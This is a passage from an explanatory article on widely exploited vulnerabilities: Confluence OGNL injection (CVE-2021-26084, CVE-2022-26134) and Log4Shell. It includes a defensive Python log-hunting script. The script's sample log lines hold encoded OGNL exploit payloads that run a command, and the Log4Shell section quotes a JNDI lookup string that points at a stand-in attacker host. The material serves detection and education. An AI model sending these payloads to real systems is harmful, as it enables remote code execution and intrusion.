The 12 Most Frequently Exploited Vulnerabilities in 2022 (3)

Related: The 12 Most Frequently Exploited Vulnerabilities in 2022 (2)

7–8. Atlassian Confluence Server & Data Center (CVE-2021-26084, CVE-2022-26134)

Atlassian Confluence, a collaboration and documentation platform used by many government and private sector organizations, is also highly favored by threat actors. The two shortlisted vulnerabilities, CVE-2021-26084 and CVE-2022-26134, are both related to Object Graph Navigation Language (OGNL) injection.

Large-scale exploitation of CVE-2021-26084 began in September 2021. Confluence is designed to let multiple teams collaborate on shared projects, and a malicious actor could use this OGNL injection flaw to execute arbitrary code on a Confluence Server or Data Center instance. The attacker's code runs with the same privileges as the account the Confluence service runs under, so the attacker can execute any command, escalate to administrative privileges, and establish a foothold in the environment. CISA issued an advisory directing users and administrators to apply Atlassian's updates to prevent compromise.

Just nine months later, Atlassian disclosed another OGNL injection vulnerability affecting Confluence Server and Data Center. Tracked as CVE-2022-26134, it allows an unauthenticated attacker to execute arbitrary code on all supported Confluence Server and Data Center versions; the OGNL expression is delivered in the URI path of a single HTTP request, so exploitation attempts are visible in web server access logs. After a proof of concept (PoC) was released within a week of the initial disclosure, this critical vulnerability quickly became one of the most exploited. In observed intrusions, CVE-2022-26134 was used to achieve unauthenticated RCE on a server and then drop a Behinder web shell. Behinder gives malicious actors very powerful capabilities, including interaction with Meterpreter and Cobalt Strike and a memory-only (in-memory) web shell.
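As an added example (not code from the original article or from Atlassian), the following Python script shows how exploitation attempts for both Confluence CVEs look in ordinary web server access logs and how to hunt for them. The log lines, IP addresses and payloads are constructed for the demonstration; the request shapes follow the publicly documented patterns (a percent-encoded OGNL expression as the URI path for CVE-2022-26134, and a queryString parameter carrying \u0027 and an OGNL #{...} block sent to the createpage-entervariables.action or doenterpagevariables.action endpoint for CVE-2021-26084). The function and constant names are the example's own.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed access-log lines in combined log format (not real captures).
# They mimic the publicly documented request shapes for the two Confluence CVEs:
#   CVE-2022-26134: an OGNL expression, percent-encoded, as the URI path segment.
#   CVE-2021-26084: the "queryString" parameter of the *entervariables.action
#                   endpoints carrying "\u0027" (an escaped quote that slipped
#                   past Confluence's input check) followed by OGNL "#{...}".
SAMPLE_LOG = """\
203.0.113.9 - - [03/Jun/2022:10:16:20 +0000] "GET /display/ENG/Runbook HTTP/1.1" 200 18233 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Jun/2022:10:16:41 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29%7D/ HTTP/1.1" 302 0 "-" "curl/7.68.0"
198.51.100.7 - - [03/Jun/2022:10:17:02 +0000] "GET /%2524%257B%2540java.lang.Runtime%2540getRuntime%2528%2529.exec%2528%2522id%2522%2529%257D/ HTTP/1.1" 302 0 "-" "curl/7.68.0"
198.51.100.8 - - [02/Sep/2021:08:44:12 +0000] "GET /pages/createpage-entervariables.action?SpaceKey=x&queryString=aaa%5Cu0027%2B%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D%7D%2B%5Cu0027 HTTP/1.1" 200 5123 "-" "python-requests/2.26"
203.0.113.9 - - [02/Sep/2021:08:50:00 +0000] "GET /pages/createpage-entervariables.action?SpaceKey=ENG HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
"""

# Combined log format: client ip, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The two endpoints abused for CVE-2021-26084.
ENTERVARS_RE = re.compile(r"/pages/(createpage-entervariables|doenterpagevariables)\.action$")


def fully_decode(s: str, max_rounds: int = 3) -> str:
    """Percent-decode until the text stops changing, so double encoding
    (%2524 -> %24 -> $) cannot hide the OGNL markers from the checks below."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (client_ip, cve_id, decoded_target) for a matching line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    dpath, dquery = fully_decode(path), fully_decode(query)
    decoded_target = dpath + ("?" + dquery if query else "")

    # CVE-2022-26134: a "${" in the request *path* is never legitimate for Confluence.
    if "${" in dpath:
        return (m.group("ip"), "CVE-2022-26134", decoded_target)

    # CVE-2021-26084: only the GET form is visible here. POST bodies are not in
    # access logs, so POSTs to these endpoints need request-body or WAF logging.
    if ENTERVARS_RE.search(dpath) and ("\\u0027" in dquery or "#{" in dquery):
        return (m.group("ip"), "CVE-2021-26084", decoded_target)
    return None


def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Classify every line and return the hits in log order."""
    hits: List[Tuple[str, str, str]] = []
    for line in text.splitlines():
        hit = classify(line)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for ip, cve, target in scan_log(SAMPLE_LOG):
        print(f"{cve}  from {ip}: {target}")
```

Two points matter in practice. Decoding has to be repeated until the text stops changing, otherwise a double-encoded path (%2524 for $) passes a single-decode check. And an access log only shows the GET form of CVE-2021-26084; the POST form puts the OGNL payload in the request body, so a POST to the entervariables endpoints can only be judged with request-body logging, a WAF log, or the Confluence application logs.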

According to Atlassian's website, the company serves 83 percent of Fortune 500 companies, has 10 million monthly active users, and has more than 235,000 customers in more than 190 countries. These two Atlassian CVEs demonstrate how financially motivated threat actors continue to exploit vulnerabilities in widely deployed products to attack many attractive targets simultaneously.

9. Log4Shell (CVE-2021-44228)

Log4Shell, tracked as CVE-2021-44228 and also known as the "Log4j vulnerability", is a critical RCE vulnerability in Apache Log4j 2 (versions 2.0-beta9 through 2.14.1), a popular Java-based logging library used in a vast number of applications. The vulnerability allows a remote attacker to execute arbitrary code on an affected system, which can lead to unauthorized access, data disclosure, or compromise of the entire system.

The vulnerability, first publicly disclosed in December 2021, stems from the message lookup feature of the "log4j-core" component: Log4j 2 evaluated "${...}" lookup expressions found in the log message itself, including a "jndi" lookup that fetches and loads an object from a remote LDAP or RMI server. Because many applications log attacker-controlled input such as HTTP headers, user agents or usernames, an attacker could place a string like "${jndi:ldap://attacker-host/x}" in that input and have the application load and execute code of the attacker's choosing. This flaw exposed a wide variety of applications, including web servers, enterprise software, and cloud-based services that rely on Log4j for logging.

Although Apache quickly released a patch for the CVSS 10.0 RCE vulnerability (Log4j 2.15.0 disabled message lookups by default, and 2.16.0 removed them entirely), security experts warned that, given the library's widespread use among major vendors, exploitation would continue and could lead to widespread malware deployment. CISA subsequently issued Emergency Directive 22-02 ordering Federal Civilian Executive Branch (FCEB) agencies to patch their systems to address this critical vulnerability.

Log4Shell's rapid exploitation is attributed to its deployment across many industries and platforms. What's more, remediation has proven extremely challenging: Log4j is frequently bundled as a transitive dependency inside other products and application archives, so many organizations struggle to identify and update every instance in their infrastructure in a timely manner.